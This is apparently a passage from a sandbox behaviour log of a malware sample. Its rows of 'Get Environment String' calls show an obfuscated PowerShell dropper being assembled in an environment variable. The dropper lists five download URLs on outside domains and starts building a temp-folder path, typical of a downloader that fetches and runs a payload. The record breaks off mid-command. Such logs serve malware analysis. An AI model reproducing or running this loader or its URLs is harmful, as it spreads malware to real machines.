| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.c |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.co |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/ |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/H |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/Hb |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/Hbu |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5 |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5j |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jl |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@ |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@h |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@ht |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@htt |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http: |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http:/ |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http:// |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://p |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pi |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pib |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibu |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibui |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuil |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuild |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuildi |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuildin |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding. |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.c |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.co |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/ |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2 |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2p |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pj |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjN |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZ |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZd |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZdd |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK' |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'. |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.S |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Sp |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Spl |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Spli |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split( |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split(' |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@ |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@' |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@') |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@'); |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$ |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$n |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nL |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF= |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=( |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([ |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([S |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([Sy |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([Sys |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([Syst |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([Syste |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System. |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.I |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO |
|
1 | |
| Get Environment String | name = VYw, result_out = |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO. |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.P |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Pa |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Pat |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path] |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]: |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]:: |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::G |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::Ge |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::Get |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetT |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTe |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTem |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTemp |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempP |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPa |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPat |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath( |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath() |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+ |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+' |
|
1 | |
